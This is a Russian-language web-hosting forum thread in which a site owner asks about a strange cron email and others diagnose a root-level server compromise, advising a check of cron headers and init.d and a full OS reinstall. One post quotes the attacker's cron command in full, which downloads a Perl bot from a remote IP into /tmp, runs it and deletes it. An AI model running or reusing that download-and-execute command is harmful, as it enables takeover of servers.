Форум Сайтостроение Безопасность

Непонятное письмо от Cron

Samail
На сайте с 10.05.2007
Offline
369
Samail
1664

Получил только что письмо: 

--2013-10-30 16:20:01--  http://87.118.99.84/robot2.txt

Connecting to 87.118.99.84:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 17170 (17K) [text/plain]

Saving to: `/tmp/robot2.txt'



     0K .......... ......                                     100%  196K=0.09s



2013-10-30 16:20:02 (196 KB/s) - `/tmp/robot2.txt' saved [17170/17170]



sh: line 0: kill: www-data: arguments must be process or job IDs

sh: line 0: kill: 32.9: arguments must be process or job IDs

sh: line 0: kill: 0.2: arguments must be process or job IDs

sh: line 0: kill: (4660) - No such process

sh: line 0: kill: (2476) - No such process

sh: line 0: kill: ?: arguments must be process or job IDs

sh: line 0: kill: R: arguments must be process or job IDs

sh: line 0: kill: 15:58: arguments must be process or job IDs

sh: line 0: kill: 7:02: arguments must be process or job IDs

sh: line 0: kill: auditd: arguments must be process or job IDs

Касперский ругается на файл по ссылке. В заданиях крона ничего не нашел относительно этой ссылки. Что это вообще такое? И какие действия предпринять?

N
На сайте с 06.05.2007
Offline
419
netwind
#1

Samail, по ссылке какой-то простенький бот, выполняющий задания.

cron обычно оформляет письмо так, что в Subject видно команду-задание, а во From: имя юзера. Раз не нашли, то задание могли уже удалить. А вот скрипт может и работает еще.

Надо поискать этот запущенный процесс и подумать каким образом им удалось добавить задание.

Ну забыли отключить отправку вывода на email . Все ж мы люди :)

Кнопка вызова админа ()
Почему в ispmanager 6, База данных форума .... Cron загаживает почту
Samail
На сайте с 10.05.2007
Offline
369
Samail
#2
netwind:
cron обычно оформляет письмо так, что в Subject видно команду-задание, а во From: имя юзера.

Subject 

wget http://87.118.99.84/robot2.txt -O /tmp/robot2.txt;perl /tmp/robot2.txt;rm -rf /tmp/robot2.txt

From: (Cron Daemon)

N
На сайте с 06.05.2007
Offline
419
netwind
#3

Samail, тут все ожидаемо.

Важный вопрос сейчас - как это предупредить. Я предполагаю стандартную схему - украли пароль от ftp. Какие-то еще плохие симптомы с сайтом наблюдаются ведь?

Samail
На сайте с 10.05.2007
Offline
369
Samail
#4
netwind:
Samail, тут все ожидаемо.
Важный вопрос сейчас - как это предупредить. Я предполагаю стандартную схему - украли пароль от ftp. Какие-то еще плохие симптомы с сайтом наблюдаются ведь?

Наблюдаются. И смена пароля не помогает. Если я в панели вообще отключу FTP, это чем-то поможет? Я всё равно всё через менеджер файлов делаю.

N
На сайте с 06.05.2007
Offline
419
netwind
#5

Samail, раз уже меняли пароль и проверили свой компьютер на вирус - скорее не поможет. Пробуйте все стандартные действия и способы очистки от веб-шелов из прикрепленной темы.

То, что вы увидели письмо от сron, ничем особенным ваш случай не выделяет. Просто злоумышленники решили использовать cron.

Samail:
From: (Cron Daemon)

тут я ошибся. Попробуйте служебные заголовки письма посмотреть и получите имя аккаунта пользователя, от которого запущено задание. Будет что-то типа X-Cron-Env: <LOGNAME=user1> Возможно, так получится найти удалить задание.

Проверить сайт на трой Открываю свой сайт, а GoGetLinks.net - увели деньги
Samail
На сайте с 10.05.2007
Offline
369
Samail
#6
netwind:
опробуйте служебные заголовки письма посмотреть и получите имя аккаунта пользователя, от которого запущено задание. Будет что-то типа X-Cron-Env: <LOGNAME=user1>

X-Cron-Env: <SHELL=/bin/sh>

X-Cron-Env: <PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin>

X-Cron-Env: <HOME=/root>

X-Cron-Env: <LOGNAME=root>

N
На сайте с 06.05.2007
Offline
419
netwind
#7

Samail, ну, получается, от root задание-то.

В таких случаях для надежности делают бекап пользовательских данных и полностью переустанавливают ОС. Благо большинство конфигураций это просто ОС + панель.

Если злоумышленник может запускать команды от root, то его закладки могут быть настолько хитро запрятаны, что их нет смысла искать.

Вопрос по бэкапу FastVPS - неадекватная реакция Нубовопрос про хостинг
freezebreeze
На сайте с 31.10.2013
Offline
9
freezebreeze
#8

Для начала поменять пароль root'а, проверить init.d на запуск левых демонов от имени рута.

---------- Добавлено 01.11.2013 в 06:11 ----------

Но самое надёжное, это всё же переустановить ОСь и разобраться с путём проникновения. Возможно через уязвимости в сайтах всё происходит.

А это означает неправильную конфигурацию web сервера (apache возможно запускается от имени root)

Верить никому нельзя. Мне — можно.
Павел Дуров: держитесь подальше Почему Wonder вышел именно Крупная утечка данных в

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий